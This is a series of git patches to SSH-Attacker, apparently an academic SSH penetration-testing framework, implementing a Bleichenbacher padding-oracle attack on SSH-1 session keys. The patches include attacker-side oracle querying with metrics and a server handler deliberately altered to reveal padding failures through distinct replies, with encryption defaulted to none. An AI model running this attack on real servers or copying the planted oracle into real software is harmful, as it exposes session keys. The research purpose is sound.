checkPKCSConformity(final byte[] msg, int currentAttempt) { + private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { // we are initializing a new connection in every loop step, since most // of the known servers close the connection after an invalid handshake Config sshConfig = config; sshConfig.setWorkflowExecutorShouldClose(false); WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(sshConfig, msg); + + GenericReceiveAction receiveOracleResultAction = new GenericReceiveAction(); + trace.addSshAction(receiveOracleResultAction); + State state = new State(sshConfig, trace); WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); @@ -93,14 +104,34 @@ private boolean checkPKCSConformity(final byte[] msg, int currentAttempt) { CONSOLE.info("Number of queries so far: {}", numberOfQueries); } - boolean conform = false; + boolean conform[] = {false, false}; try { workflowExecutor.executeWorkflow(); + + ProtocolMessage lastMessage = receiveOracleResultAction.getReceivedMessages().get(0); + LOGGER.debug("Received: {}", lastMessage.toString()); + + if (lastMessage instanceof DisconnectMessageSSH1) { + LOGGER.debug("Received Disconnected Message -> nothing was correct .... :("); + } else if (lastMessage instanceof FailureMessageSSH1) { + LOGGER.debug("Received Failure Message -> the first one was correct :|"); + conform[0] = true; + } else if (lastMessage instanceof SuccessMessageSSH1) { + LOGGER.debug("Received Failure Message -> both were correct :)"); + conform[0] = true; + conform[1] = true; + } else { + LOGGER.fatal("Something gone wrong with the preconfigured oracle...."); + } + + LOGGER.fatal("Attempt {}", counter); + counter++; + if (!trace.executedAsPlanned()) { // Something did not execute as planned, the result may be either way throw new WorkflowExecutionException("Workflow did not execute as planned!"); } - clearConnections(state); + // clearConnections(state); } catch (WorkflowExecutionException e) { // If workflow execution failed, retry. This might be because a packet got lost diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 7266dc481..f5c5a5800 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -97,6 +97,8 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { /** End-of-message sequence of the servers' VersionExchangeMessage */ private String serverEndOfMessageSequence; + private boolean doNotEncryptMessages = false; + // endregion // region Pre-KeyExchange @@ -537,7 +539,7 @@ public Config() { .collect(Collectors.toCollection(LinkedList::new)); supportedCipherMethods = - Arrays.stream(new CipherMethod[] {CipherMethod.SSH_CIPHER_3DES}) + Arrays.stream(new CipherMethod[] {CipherMethod.SSH_CIPHER_NONE}) .collect(Collectors.toCollection(LinkedList::new)); supportedAuthenticationMethods = @@ -1825,4 +1827,12 @@ public Boolean getEndless() { public void setEndless(Boolean endless) { this.endless = endless; } + + public boolean isDoNotEncryptMessages() { + return doNotEncryptMessages; + } + + public void setDoNotEncryptMessages(boolean doNotEncryptMessages) { + this.doNotEncryptMessages = doNotEncryptMessages; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java index cf6af0d29..fccc752e3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaPkcs1Cipher.java @@ -54,8 +54,13 @@ public byte[] decrypt(byte[] encryptedData) throws CryptoException { try { prepareCipher(Cipher.DECRYPT_MODE); return cipher.doFinal(encryptedData); - } catch (IllegalBlockSizeException | BadPaddingException e) { + } catch (IllegalBlockSizeException e) { + LOGGER.fatal("Encryption-Error: {}", e.getMessage()); + LOGGER.fatal(e); throw new CryptoException("Could not decrypt data with RSA/ECB/PKCS1Padding.", e); + } catch (BadPaddingException e) { + LOGGER.fatal("Possible Attack detected, bad Padding"); + throw new CryptoException(e); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index aab27d2f9..80bde11ae 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -177,8 +177,11 @@ public HintedInputStream getDataStream() throws IOException { return currentInputStream; } else { LOGGER.debug("Trying to get datastream while no data is available"); - this.receiveMoreDataForHint(null); - return currentInputStream; + // this.receiveMoreDataForHint(null); + // <--- Testing --> + throw new EndOfStreamException( + "The original data stream does not produce any more data and there is no next datastream -> returning now"); + // return currentInputStream; } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index d1868f057..ca0f2720d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -110,6 +110,8 @@ public PacketCipher getActiveDecryptCipher() { /** End-of-message sequence of the servers' VersionExchangeMessage */ private String serverEndOfMessageSequence; + /** Result of BB-Oracle; 0 = both false, 1 = first correct, second false, 2 = both correct */ + private int bbResult = 0; // endregion // region Key Exchange Initialization @@ -1034,4 +1036,12 @@ public byte[] getSessionKey() { public void setSessionKey(byte[] sessionKey) { this.sessionKey = sessionKey; } + + public int getBbResult() { + return bbResult; + } + + public void setBbResult(int bbResult) { + this.bbResult = bbResult; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index c5a5ce8e0..5a24e3a9e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -31,6 +31,7 @@ import java.util.Arrays; import java.util.Objects; import java.util.Optional; +import javax.crypto.BadPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -199,6 +200,8 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE AbstractCipher innerEncryption; AbstractCipher outerEncryption; + boolean firstEncryptionSuccessfull = false; + try { if (hostPrivateKey.getModulus().bitLength() @@ -208,10 +211,18 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE "Hostkeylenght: {}, ServerKeyLenght: {}", hostPrivateKey.getModulus().bitLength(), serverPrivatKey.getModulus().bitLength()); + LOGGER.debug(sessionKey.length); + if (sessionKey.length > hostPrivateKey.getModulus().bitLength()) { + + LOGGER.debug( + "Suspisius, the encrypted session key is longer then the host key modulus"); + } outerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); sessionKey = outerEncryption.decrypt(sessionKey); + firstEncryptionSuccessfull = true; + innerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); sessionKey = innerEncryption.decrypt(sessionKey); @@ -219,12 +230,34 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE outerEncryption = CipherFactory.getRsaPkcs1Cipher(serverPrivatKey); sessionKey = outerEncryption.decrypt(sessionKey); + firstEncryptionSuccessfull = true; + innerEncryption = CipherFactory.getRsaPkcs1Cipher(hostPrivateKey); sessionKey = innerEncryption.decrypt(sessionKey); } } catch (CryptoException e) { - throw new RuntimeException(e); + LOGGER.fatal(e); + if (e.getCause() instanceof BadPaddingException) { + if (firstEncryptionSuccessfull) { + LOGGER.fatal("Caused by BadPadding in second encryption"); + // SEND Disconnect Message + // only the first one is correct, setting to 1 + sshContext.setBbResult(1); + } else { + LOGGER.fatal("Caused by BadPadding in first encryption"); + // SEND Failure Message + // no key is correct - setting to 0 + sshContext.setBbResult(0); + } + } else { + sshContext.setBbResult(2); + } + // Both correct, setting BB Result to 2 + + // throw new RuntimeException(e); + // Set Session key to dummy value + sessionKey = new byte[32]; } // Set Sessionkey @@ -245,6 +278,11 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE @Override public void adjustContextAfterMessageSent() { + + if (sshContext.getContext().getConfig().isDoNotEncryptMessages()) { + LOGGER.debug("Not enabling the encryption of packages due to configuration"); + return; + } // We Send here, because we are in the perperator EncryptionAlgorithm encryptionAlgorithm; Chooser chooser = sshContext.getChooser(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java index 68cbe9f32..aadd25ac2 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java @@ -87,7 +87,11 @@ public static WorkflowTrace copy(WorkflowTrace orig) { @XmlElement(type = DynamicKeyExchangeAction.class, name = "DynamicKeyExchange"), @XmlElement(type = SendMangerSecretAction.class, name = "SendMangerSecret"), @XmlElement(type = ForwardMessagesAction.class, name = "ForwardMessages"), - @XmlElement(type = ProxyFilterMessagesAction.class, name = "ProxyFilterMessages") + @XmlElement(type = ProxyFilterMessagesAction.class, name = "ProxyFilterMessages"), + @XmlElement( + type = SendBleichenbacherOracleReply.class, + name = "SendBleichenbacherOracle"), + @XmlElement(type = GenericReceiveAction.class, name = "GenericReceive") }) private List sshActions = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendBleichenbacherOracleReply.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendBleichenbacherOracleReply.java new file mode 100644 index 000000000..338498213 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendBleichenbacherOracleReply.java @@ -0,0 +1,108 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.workflow.action; + +import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangeSecretMessage; +import de.rub.nds.sshattacker.core.state.State; +import java.util.ArrayList; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** Custom Action for dynamically creating and sending {@link RsaKeyExchangeSecretMessage}s */ +public class SendBleichenbacherOracleReply extends SendAction { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final byte[] encodedSecret; + + /** Creates the action using the default connection alias */ + public SendBleichenbacherOracleReply() { + this(new byte[0]); + } + + /** + * Creates the action using a custom connection alias + * + * @param connectionAlias The custom connection alias + */ + public SendBleichenbacherOracleReply(String connectionAlias) { + this(new byte[0], connectionAlias); + } + + /** + * Creates the action using the default connection alias + * + * @param encodedSecret The OAEP encoded shared secret + */ + public SendBleichenbacherOracleReply(byte[] encodedSecret) { + super(); + this.encodedSecret = encodedSecret; + } + + /** + * Creates the action using a custom connection alias + * + * @param encodedSecret The OAEP encoded shared secret + * @param connectionAlias The custom connection alias + */ + public SendBleichenbacherOracleReply(byte[] encodedSecret, String connectionAlias) { + super(connectionAlias); + this.encodedSecret = encodedSecret; + } + + @Override + public void execute(State state) throws WorkflowExecutionException { + + int bbResult = state.getSshContext().getBbResult(); + messages = new ArrayList<>(); + + switch (bbResult) { + case 0: + LOGGER.debug("nothing is correct, sending Disconnect"); + messages.add(new DisconnectMessageSSH1()); + + break; + case 1: + LOGGER.debug("first is correct, sending Failure"); + messages.add(new FailureMessageSSH1()); + break; + case 2: + LOGGER.debug("first and second is correct, sending success"); + messages.add(new SuccessMessageSSH1()); + break; + } + + super.execute(state); + } + + @Override + public String toString() { + StringBuilder sb; + if (isExecuted()) { + sb = new StringBuilder("Send Bleichenbacher Oracle reply Action:\n"); + } else { + sb = new StringBuilder("Send Bleichenbacher Oracle replyAction: (not executed)\n"); + } + sb.append("\tMessages:"); + if (messages != null) { + for (ProtocolMessage message : messages) { + sb.append(message.toCompactString()); + sb.append(", "); + } + sb.append("\n"); + } else { + sb.append("null (no messages set)"); + } + return sb.toString(); + } +} From a0e3001f1511f9579b688a092ba19d3306985446 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 22 Oct 2023 21:46:40 +0200 Subject: [PATCH 094/176] Typos --- .../de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java | 4 ++-- .../de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java | 1 - .../nds/sshattacker/core/workflow/action/ReceiveAction.java | 2 +- 3 files changed, 3 insertions(+), 4 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 938fe0f1c..e616dd030 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -142,11 +142,11 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); LayerProcessingHint desiredHint = hint; InputStream dataStream = getLowerLayer().getDataStream(); - LOGGER.debug("Avialble Data: {}", dataStream.available()); + LOGGER.debug("Available Data: {}", dataStream.available()); AbstractPacketParser parser; AbstractPacket packet; - LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); + LOGGER.debug("[bro] Receiving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { parser = diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 9d3f1f954..d4d8646fa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -320,7 +320,6 @@ private void readDisconnectData(AbstractPacket packet) { new HintedInputStreamAdapterStream( null, new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); - } private void readSuccessMessage(AbstractPacket packet) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index ec807aefa..17006416f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -241,7 +241,7 @@ public ReceiveAction(String connectionAliasAlias, ProtocolMessage... messages public void execute(State state) throws WorkflowExecutionException { SshContext context = state.getSshContext(getConnectionAlias()); - LOGGER.debug("[bro] Recieving Messages"); + LOGGER.debug("[bro] Receiving Messages"); if (isExecuted()) { throw new WorkflowExecutionException("Action already executed!"); From d088f939a689dbc91ea3218292402d3f6f069b86 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 22 Oct 2023 21:47:04 +0200 Subject: [PATCH 095/176] Porting GenericReceiveAction from TLS-Attacker --- .../workflow/action/GenericReceiveAction.java | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java new file mode 100644 index 000000000..28a41d1c8 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/GenericReceiveAction.java @@ -0,0 +1,73 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.workflow.action; + +import de.rub.nds.sshattacker.core.exceptions.ActionExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.state.State; +import jakarta.xml.bind.annotation.XmlRootElement; +import java.util.LinkedList; +import java.util.List; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +@XmlRootElement +public class GenericReceiveAction extends MessageAction implements ReceivingAction { + + private static final Logger LOGGER = LogManager.getLogger(); + + public GenericReceiveAction() { + super(); + } + + public GenericReceiveAction(String connectionAlias) { + super(connectionAlias); + } + + @Override + public void execute(State state) { + if (isExecuted()) { + throw new ActionExecutionException("Action already executed!"); + } + LOGGER.debug("Receiving Messages..."); + SshContext ctx = state.getContext(getConnectionAlias()).getSshContext(); + receive(ctx, null, null); + + setExecuted(true); + String received = getReadableString(messages); + LOGGER.info("Received Messages (" + ctx + "): " + received); + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder("Receive Action:\n"); + sb.append("\tActual:"); + for (ProtocolMessage message : messages) { + sb.append(message.toCompactString()); + sb.append(", "); + } + return sb.toString(); + } + + @Override + public boolean executedAsPlanned() { + return isExecuted(); + } + + @Override + public void reset() { + messages = new LinkedList<>(); + setExecuted(null); + } + + @Override + public List> getReceivedMessages() { + return messages; + } +} From bb600e320c5ee4aa16317a619153c3c52bd9cadf Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 27 Oct 2023 23:27:04 +0200 Subject: [PATCH 096/176] Cleanup and adding metrics --- .../attacks/impl/BleichenbacherAttacker.java | 114 ++++-------------- .../attacks/pkcs1/Bleichenbacher.java | 25 +++- .../pkcs1/oracles/BleichenbacherOracle.java | 17 +-- 3 files changed, 55 insertions(+), 101 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 72d3a5995..c9f8f8ac4 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -13,20 +13,15 @@ import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; import de.rub.nds.sshattacker.attacks.general.KeyFetcher; import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; -import de.rub.nds.sshattacker.attacks.general.Vector; import de.rub.nds.sshattacker.attacks.padding.VectorResponse; -import de.rub.nds.sshattacker.attacks.padding.vector.FingerprintTaskVectorPair; import de.rub.nds.sshattacker.attacks.pkcs1.*; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; import de.rub.nds.sshattacker.attacks.response.EqualityError; -import de.rub.nds.sshattacker.attacks.response.ResponseFingerprint; -import de.rub.nds.sshattacker.attacks.task.FingerPrintTask; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; -import de.rub.nds.sshattacker.core.state.State; import java.math.BigInteger; import java.security.interfaces.RSAPublicKey; import java.util.ArrayList; @@ -65,6 +60,9 @@ public class BleichenbacherAttacker extends Attacker publicKeys = new ArrayList<>(); private CustomRsaPublicKey serverPublicKey, hostPublicKey; + private int counterInnerBleichenbacher; + private int counterOuterBleichenbacher; + /** * @param bleichenbacherConfig Manger attack config * @param baseConfig Base config @@ -88,6 +86,8 @@ public BleichenbacherAttacker( setKeyExchangeAlgorithm(); fullResponseMap = new ArrayList<>(); this.executor = executor; + this.counterInnerBleichenbacher = 0; + this.counterOuterBleichenbacher = 0; } /** @@ -285,11 +285,26 @@ public void executeAttack() { BleichenbacherOracle oracle = new BleichenbacherOracle( - this.hostPublicKey, this.serverPublicKey, getSshConfig()); + this.hostPublicKey, + this.serverPublicKey, + getSshConfig(), + counterInnerBleichenbacher, + counterOuterBleichenbacher); Bleichenbacher attacker = new Bleichenbacher( encryptedSecret, oracle, this.hostPublicKey, this.serverPublicKey); + + long start = System.currentTimeMillis(); + attacker.attack(); + + long finish = System.currentTimeMillis(); + long timeElapsed = finish - start; + LOGGER.debug("The attack took {} milliseconds", timeElapsed); + LOGGER.debug( + "It took {} tries for the inner and {} tries for the outer Bleichenbacher-Attack", + attacker.getCounterInnerBleichenbacher(), + attacker.getCounterOuterBleichenbacher()); BigInteger solution = attacker.getSolution(); /* BigInteger secret = OaepConverter.decodeSolution( @@ -327,57 +342,6 @@ public void executeAttack() { CONSOLE.info("Decoded Secret: " + secret);*/ } - private ResponseFingerprint extractValidFingerprint(RSAPublicKey publicKey) { - Pkcs1Vector vector = - Pkcs1VectorGenerator.generateCorrectFirstBytePkcs1Vector( - publicKey, getHashLength(), getHashInstance()); - State state = - new State( - sshConfig, - MangerWorkflowGenerator.generateWorkflow( - sshConfig, vector.getEncryptedValue())); - FingerPrintTask fingerPrintTask = - new FingerPrintTask( - state, - additionalTimeout, - increasingTimeout, - executor.getReexecutions(), - additionalTcpTimeout); - FingerprintTaskVectorPair stateVectorPair = - new FingerprintTaskVectorPair<>(fingerPrintTask, vector); - - executor.bulkExecuteTasks(fingerPrintTask); - ResponseFingerprint fingerprint = null; - if (stateVectorPair.getFingerPrintTask().isHasError()) { - LOGGER.warn("Could not extract fingerprint for " + stateVectorPair); - } else { - fingerprint = fingerPrintTask.getFingerprint(); - } - return fingerprint; - } - - private int getHashLength() { - switch (keyExchangeAlgorithm) { - case RSA2048_SHA256: - return 256; - case RSA1024_SHA1: - return 160; - default: - return 0; - } - } - - private String getHashInstance() { - switch (keyExchangeAlgorithm) { - case RSA2048_SHA256: - return "SHA-256"; - case RSA1024_SHA1: - return "SHA-1"; - default: - return ""; - } - } - private void setKeyExchangeAlgorithm() { if (config.getKexAlgorithm() == null) { throw new ConfigurationException("The key exchange algorithm must be set."); @@ -400,40 +364,4 @@ private void setKeyExchangeAlgorithm() { CONSOLE.info("Set key exchange algorithm to: " + keyExchangeAlgorithm); } - - public EqualityError getResultError() { - return resultError; - } - - public List getResponseMapList() { - return fullResponseMap; - } - - public boolean isErrornousScans() { - return erroneousScans; - } - - public boolean isIncreasingTimeout() { - return increasingTimeout; - } - - public void setIncreasingTimeout(boolean increasingTimeout) { - this.increasingTimeout = increasingTimeout; - } - - public long getAdditionalTimeout() { - return additionalTimeout; - } - - public void setAdditionalTimeout(long additionalTimeout) { - this.additionalTimeout = additionalTimeout; - } - - public long getAdditionalTcpTimeout() { - return additionalTcpTimeout; - } - - public void setAdditionalTcpTimeout(long additionalTcpTimeout) { - this.additionalTcpTimeout = additionalTcpTimeout; - } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 61c7cc649..e5163015a 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -37,6 +37,10 @@ public class Bleichenbacher extends Pkcs1Attack { private BigInteger three_B_sub_one = null; private BigInteger three_B_plus_one = null; + private int counterInnerBleichenbacher; + private int counterOuterBleichenbacher; + + /** * @param msg The message that should be decrypted with the attack * @param pkcsOracle The oracle to be queried @@ -104,6 +108,7 @@ private BigInteger find_smallest_s( throw new RuntimeException(e); } boolean oracleResult = queryOracle(attempt, false); + counterOuterBleichenbacher++; if (oracleResult) { return s; @@ -141,6 +146,7 @@ private BigInteger find_smallest_s_nested( BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); boolean oracleResult = queryOracle(encryptedAttempt, true); + counterInnerBleichenbacher++; if (oracleResult) { LOGGER.debug("Found smallest s: {}", s); @@ -196,6 +202,7 @@ private BigInteger find_s_in_range_nested( BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); boolean oracleResult = queryOracle(encryptedAttempt, true); + counterInnerBleichenbacher++; if (oracleResult) { return si; @@ -245,6 +252,7 @@ private BigInteger find_s_in_range( BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); boolean oracleResult = queryOracle(attempt, false); + counterOuterBleichenbacher++; if (oracleResult) { return si; @@ -360,7 +368,6 @@ public void attack() { LOGGER.debug("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); byte[] cracked_decoded = pkcs1Decode(cracked); LOGGER.debug("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); - solution = new BigInteger(cracked_decoded); } else { byte[] cracked = @@ -588,4 +595,20 @@ private BigInteger encryptBigInt(BigInteger attempt, CustomRsaPublicKey encrypti throw new RuntimeException(e); } } + + public int getCounterInnerBleichenbacher() { + return counterInnerBleichenbacher; + } + + public void setCounterInnerBleichenbacher(int counterInnerBleichenbacher) { + this.counterInnerBleichenbacher = counterInnerBleichenbacher; + } + + public int getCounterOuterBleichenbacher() { + return counterOuterBleichenbacher; + } + + public void setCounterOuterBleichenbacher(int counterOuterBleichenbacher) { + this.counterOuterBleichenbacher = counterOuterBleichenbacher; + } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index 98da96de1..20c0cde43 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -42,21 +42,25 @@ public class BleichenbacherOracle extends Pkcs1Oracle { private final int maxAttempts; - private int counter; /** * @param hostPublicKey The public key * @param config Config */ public BleichenbacherOracle( - CustomRsaPublicKey hostPublicKey, CustomRsaPublicKey serverPublicKey, Config config) { + CustomRsaPublicKey hostPublicKey, + CustomRsaPublicKey serverPublicKey, + Config config, + int attemptCounterInnerBleichenbacher, + int attemptCounterOuterBleichenbacher) { this.hostPublicKey = hostPublicKey; this.serverPublicKey = serverPublicKey; this.blockSize = MathHelper.intCeilDiv(this.hostPublicKey.getModulus().bitLength(), Byte.SIZE); this.config = config; this.maxAttempts = 10; - counter = 0; + this.counterOuterBleichenbacher = attemptCounterOuterBleichenbacher; + this.counterInnerBleichenbacher = attemptCounterInnerBleichenbacher; } /** @@ -113,9 +117,11 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { if (lastMessage instanceof DisconnectMessageSSH1) { LOGGER.debug("Received Disconnected Message -> nothing was correct .... :("); + counterOuterBleichenbacher++; } else if (lastMessage instanceof FailureMessageSSH1) { LOGGER.debug("Received Failure Message -> the first one was correct :|"); conform[0] = true; + counterInnerBleichenbacher++; } else if (lastMessage instanceof SuccessMessageSSH1) { LOGGER.debug("Received Failure Message -> both were correct :)"); conform[0] = true; @@ -124,8 +130,7 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { LOGGER.fatal("Something gone wrong with the preconfigured oracle...."); } - LOGGER.fatal("Attempt {}", counter); - counter++; + LOGGER.fatal("Attempt {}", counterInnerBleichenbacher + counterOuterBleichenbacher); if (!trace.executedAsPlanned()) { // Something did not execute as planned, the result may be either way @@ -156,8 +161,6 @@ private ResponseFingerprint getFingerprint(State state) { private void clearConnections(State state) { try { state.getSshContext(); - LOGGER.debug("Transporthandler is:"); - LOGGER.debug(state.getSshContext().getTransportHandler().toString()); if (!state.getSshContext().getTransportHandler().isClosed()) { state.getSshContext().getTransportHandler().closeConnection(); } From a70867f70a504f9b2ac97dbd509896f4933ad8b5 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 27 Oct 2023 23:27:16 +0200 Subject: [PATCH 097/176] minor fixes, typos --- .../main/java/de/rub/nds/sshattacker/core/config/Config.java | 2 +- .../nds/sshattacker/core/config/delegate/ServerDelegate.java | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index f5c5a5800..abf7ff2ae 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -301,7 +301,7 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { private List> hostKeys; /** Server key */ - @XmlElement(name = "hostKey") + @XmlElement(name = "serverKey") @XmlElementWrapper private List> 